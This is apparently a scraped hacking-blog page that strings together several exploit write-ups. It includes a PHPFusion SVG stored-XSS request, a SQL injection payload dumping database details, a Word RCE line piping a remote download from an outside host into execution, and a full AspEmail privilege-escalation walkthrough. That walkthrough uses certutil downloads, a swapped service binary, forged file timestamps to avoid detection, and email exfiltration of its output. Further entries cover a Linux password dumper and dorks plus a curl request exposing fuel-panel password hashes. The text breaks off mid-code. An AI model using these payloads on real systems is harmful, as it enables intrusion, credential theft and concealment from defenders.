Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
Application: PHPFusion
Version: 9.10.30
Bugs: XSS
Technology: PHP
Vendor URL: https://www.php-fusion.co.uk/home.php
Software Link: https://sourceforge.net/projects/php-fusion/
Date of found: 28-04-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)
2. upload malicious svg file
svg file content ===>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
poc request:
POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1
Host: localhost
Content-Length: 1198
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0
Connection: close
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="reqid"
187c77be8e52cf
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="cmd"
upload
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="target"
l1_Lw
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"
SVG_XSS.svg
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="mtime[]"
1681116842
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="overwrite"
0
------WebKitFormBoundaryxF2jB690PpLWInAA--
3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)
poc video : https://youtu.be/6yBLnRH8pOY
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109104
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
# Date: 2023-04-28
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.9.2
# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913
# CVE: CVE-2023-25438
MilleGPG / MilleGPG5 also known as "Governo Clinico 3"
Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.
Affected/tested version: MilleGPG5 5.9.2
Summary:
Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the
Italian general practice network.
MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,
complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the
General Practitioner, also offering contextual access to the most authoritative scientific content and CME training.
Vuln desc:
The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some
files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness
abusing the "write" permission of the main application available to all users on the system or network.
Details:
Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:
C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application)
C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files)
C:\Program Files\MilleGPG5\k-platform\ (api and webapp files)
such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA
## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-ID: CVE-2023-28311
## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!
```vbs
Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
## Proof and Exploit
[href](https://streamable.com/s60x3k)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
# Date: 2023-04-23
# CVE: CVE-2023-2417
# Exploit Author: MrEmpy
# Vendor Homepage: https://www.ks-soft.net
# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
# Version: > 12.56
# Tested on: Windows 10 21H2
Title:
================
Advanced Host Monitor > 12.56 - Unquoted Service Path
Summary:
================
An unquoted service path vulnerability has been discovered in Advanced Host
Monitor version > 12.56 affecting the executable "C:\Program Files
(x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when
the service's path is misconfigured, allowing an attacker to run a
malicious file instead of the legitimate executable associated with the
service.
An attacker with local user privileges could exploit this vulnerability to
replace the legitimate RMA-Win\rma_active.exe service executable with a
malicious file of the same name and located in a directory that has a
higher priority than the legitimate directory. That way, when the service
starts, it will run the malicious file instead of the legitimate
executable, allowing the attacker to execute arbitrary code, gain
unauthorized access to the compromised system, or stop the service from
functioning.
To exploit this vulnerability, an attacker would need local access to the
system and the ability to write and replace files on the system. The
vulnerability can be mitigated by correcting the service path to correctly
quote the full path of the executable, including quotation marks.
Furthermore, it is recommended that users keep software updated with the
latest security updates and limit physical and network access to their
systems to prevent malicious attacks.
Proof of Concept:
================
C:\>sc qc ActiveRMAService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveRMAService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files
(x86)\HostMonitor\RMA-Win\rma_active.exe /service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KS Active Remote Monitoring Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/
# Usage: python swagger-exploit.py https://[swagger-page].com
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys
if __name__ == "__main__":
target = sys.argv[1]
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}
options = webdriver.ChromeOptions()
options.add_argument("--headless")
options.add_argument("--ignore-certificate-errors")
options.add_argument("--log-level=3")
options.add_experimental_option("excludeSwitches", ["enable-logging"])
# Browser webdriver path
drive_service = Service("C:/chromedriver.exe")
driver = webdriver.Chrome(service=drive_service,
options=options,
desired_capabilities=desired_capabilities)
driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
time.sleep(10)
driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
time.sleep(10)
logs = driver.get_log("performance")
with open("log_file.json", "w", encoding="utf-8") as f:
f.write("[")
for log in logs:
log_file = json.loads(log["message"])["message"]
if("Network.response" in log_file["method"]
or "Network.request" in log_file["method"]
or "Network.webSocket" in log_file["method"]):
f.write(json.dumps(log_file)+",")
f.write("{}]")
driver.quit()
json_file_path = "log_file.json"
with open(json_file_path, "r", encoding="utf-8") as f:
logs = json.loads(f.read())
for log in logs:
try:
url = log["params"]["request"]["url"]
if(url == "https://petstore.swagger.io/v2/hacked1.json"):
print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
if(url == "https://petstore.swagger.io/v2/hacked2.json"):
print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
except Exception as e:
pass
# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29849
*Affected Parameters:*
btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],
itemqty[], btnMenuItemID
*Steps to Reproduce:*
1. First login your staff panel.
2. then go to "order" menu and Select menu then create order and intercept
request data using burp suite.
so your request data will be:
POST /bangresto/staff/displayitem.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/staff/order.php
Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
Connection: close
btnMenuItemID=1&qty=1
3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based
SQL Injection use this query ".1 union select
1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--
-" in "btnMenuItemID" parameter.
4. Check browser you will see user, database and version informations.
5. You could also use sqlmap to dump the whole database by saving the web request from BurpSuite
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################
# ==================================================================================================================
[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# ==================================================================================================================
* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
* Now we know that AspEmail service is active.
# ==================================================================================================================
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe" /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
# ================================================================================================================== #
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in linux language.
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
# ==================================================================================================================
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.
# ==================================================================================================================
* Now we will modify the EmailAgent file and inject a self-written malware.
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.
# ==================================================================================================================
* Now we check for my malware ownership.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
# =================================================================================================================#
# #
####################################################################################################################
# #[EmailAgent.cs]# #
####################################################################################################################
# #
#
* We program this malware in such a way that when the server is reboot(when the services are restarted), #
* It will be triggered and execute the codes we want, #
* And then send a printout of all this to the email address we specified. #
#
using System; #
using System.Linq; #
using System.Text; #
using System.Diagnostics; #
using System.IO; #
using System.Collections; #
#
Namespace CliToolSpace #
{ #
class _Main #
{ #
static void Main(string[] args) #
{ #
Cli commandLine = new Cli(); #
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
commandLine.Execute(); #
commandLine.ToFile(@"C:\Windows\Temp\"); #
} #
} #
} #
#
# #
####################################################################################################################
# #[Mail.cs]# #
####################################################################################################################
# #
#
using System; #
using System.Net.Mail; #
using System.Net; #
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #
var mail = new MailMessage(); #
mail.From = new MailAddress("mail@deepseclab.com"); #
mail.To.Add("mail@hacker.com"); #
mail.Subject = "Trigger Successful!"; #
mail.IsBodyHtml = true; #
string htmlBody; #
htmlBody = "<strong>This server has been rebooted.</strong>"; #
mail.Body = htmlBody; #
Attachment attachment; #
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #
mail.Attachments.Add(attachment); #
SmtpServer.Port = 587; #
SmtpServer.UseDefaultCredentials = false; #
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #
SmtpServer.EnableSsl = true; #
SmtpServer.Timeout = int.MaxValue; #
SmtpServer.Send(mail); #
#
# #
####################################################################################################################
# #[Run.bat]# #
####################################################################################################################
# #
#
whoami > C:\Windows\Temp\Export.txt #
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
cd c:\Windows\Tasks #
del Run.bat & del Mail.exe #
#
# #
####################################################################################################################
# #
[+]Trigger Successful![+] #
#
[+] C:\PenTest>systeminfo | findstr "Boot Time" #
System Boot Time: 13.04.2022, 07:46:06 #
#
# #
####################################################################################################################
#[Export.txt]# #
####################################################################################################################
# #
#
NT AUTHORITY\SYSTEM #
#
# #
####################################################################################################################
# #
# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
# =================================================================================================================#
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
# ==================================================================================================================
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
# ==================================================================================================================
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
# ==================================================================================================================
Mimipenguin beta-2.0
A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.
alt text
Details
This version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments.
Project address : link
# Exploit Title: Franklin Fueling Systems TS-550 - Default Password
# Date: 4/16/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
# Version: TS-550
# Tested on: Linux/Android(termux)
Step 1 : attacker can using these dorks and access to find the panel
inurl:"relay_status.html"
inurl:"fms_compliance.html"
inurl:"fms_alarms.html"
inurl:"system_status.html"
inurl:"system_reports.html'
inurl:"tank_status.html"
inurl:"sensor_status.html"
inurl:"tank_control.html"
inurl:"fms_reports.html"
inurl:"correction_table.html"
Step 2 : attacker can send request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi
Step 3 : if get response that show like this
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>
Step 4 : attacker can crack the hashesh using john the ripper
notice : most of the panels password is : admin
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
# Date : 03/27/2023
# Exploit Author : Hadi Mene
# Vendor Homepage : https://www.gdidees.eu/
# Software Link : https://www.gdidees.eu/cms-1-0.html
# Version : 3.9.1 and earlier
# Tested on : Debian 11
# CVE : CVE-2023-27179
### Summary:
GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.
### Description :
Imgdownload.php is mainly used by the QR code generation module to download an QR code.
The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.
Furthermore, there is no admin session check in this code as it should since only the admin user should normally
be able to download QR code.
Vulnerable Code :
3. if (isset($_GET["filename"])) {
